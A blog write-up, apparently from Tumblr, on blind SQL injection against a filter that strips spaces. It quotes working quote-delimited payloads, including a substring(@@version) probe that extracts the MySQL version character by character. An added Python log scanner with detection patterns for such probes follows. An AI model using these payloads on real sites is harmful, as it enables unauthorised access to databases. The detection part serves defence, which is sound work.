https://vikasprogrammer.tumblr.com/post/49251154907/blind-sql-injection-without-white-spaces
Blind SQL Injection without White Spaces
So, you just found out that doing www.example.com?id=1' throws a nice MySQL error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''id=1'' ORDER BY page_id desc LIMIT 1' at line 1
Happy, well not yet!
Looking closely at the error and taking out just the part between "near" and "at line 1":
'id=1'' ORDER BY page_id desc LIMIT 1
This means that no matter what I input, it will be placed between 'id=<myinput>'. Strange!
So to escape 'id=<myinput>' I tried ?id=1' or '1'='1, and interestingly:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''id=1'' ORDER BY page_id desc LIMIT 1' at line 1
And, more interestingly, no mention of my beloved '1'='1. At this point I was basically angry.
I thought to myself, maybe it's removing the spaces, so I tried ?id=1'or'1'='1 and voila! No errors.
And moments laters, :(
Now, I had to create a query which can identify true and false condition AND with no white space.
[FAST FORWARD]
After a long list of tries, I got this:
/?id=1'or'1'=(SELECT(_utf8'.')=substring(@@version,X,1))and'1'='1
So, '.' is the placeholder for the character being tested and X is the counter that rotates over all the chars of the output. As we know, if X=2 the output has to be '.', i.e. a TRUE condition. In this case I got NO "page not found" error, and if I tried something else in place of '.', I got the "page not found" error. That's it! Game over!
I wrote a quick Perl script to iterate over all the output chars for all possible printable ASCII chars. Profit!
Perl Script: http://pastebin.com/ixB5d90N
Output:
$ perl blind-version-test.pl
5.1.1-Ubuntu
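The lesson for the defending side is that stripping spaces is not a filter: in SQL a quote ends one token and starts the next, so 1'or'1'='1 lexes exactly like 1 or 1 = 1. The following is an added example (not from the original post or its Perl script) of a log check that normalises quotes to separators before matching, so the whitespace-free probes above are flagged the same as their spaced forms; the log lines are constructed and the Apache-style combined format is assumed.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed Apache-style access-log lines (sample data, not from the original post):
# a normal request, the two quote-delimited probes from the post (URL-encoded), and a
# harmless multi-parameter request.
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2013:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [01/May/2013:10:00:02 +0000] "GET /?id=1%27or%271%27=%271 HTTP/1.1" 200 5120
203.0.113.7 - - [01/May/2013:10:00:03 +0000] "GET /?id=1%27or%271%27=(SELECT(_utf8%27.%27)=substring(@@version,2,1))and%271%27=%271 HTTP/1.1" 200 5120
198.51.100.4 - - [01/May/2013:10:00:04 +0000] "GET /?id=42&page=about HTTP/1.1" 200 3300
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) HTTP/')

# Quotes are token separators to the SQL lexer, so map them to spaces before matching;
# this is exactly the step a "does it contain whitespace?" check skips.
def normalise(value: str) -> str:
    v = re.sub(r"""['"`]""", " ", value.lower())   # quotes become token separators
    v = re.sub(r"([(),=])", r" \1 ", v)            # isolate punctuation as its own tokens
    return re.sub(r"\s+", " ", v).strip()

INDICATORS = {
    "tautology": re.compile(r"\b(or|and) \S+ = \S+"),               # or 1 = 1 / and 1 = 1
    "subselect": re.compile(r"\bselect\b"),                          # nested SELECT in a value
    "char_probe": re.compile(r"\b(substring|substr|mid|ascii) \("),  # per-character extraction
    "server_var": re.compile(r"@@\w+"),                              # @@version and friends
}

def classify(value: str) -> list[str]:
    """Return the names of the indicators present in one decoded parameter value."""
    norm = normalise(value)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]

def scan_log(text: str) -> list[dict]:
    """Flag requests whose query parameters carry boolean-blind injection indicators."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl URL-decodes, so %27 is already a quote by the time we inspect it
        for name, value in parse_qsl(urlparse(m["path"]).query, keep_blank_values=True):
            found = classify(value)
            if found:
                hits.append({"line": lineno, "client": m["client"], "param": name, "indicators": found})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

On the sample above only lines 2 and 3 are flagged; the version probe trips all four indicators, the plain tautology only the first.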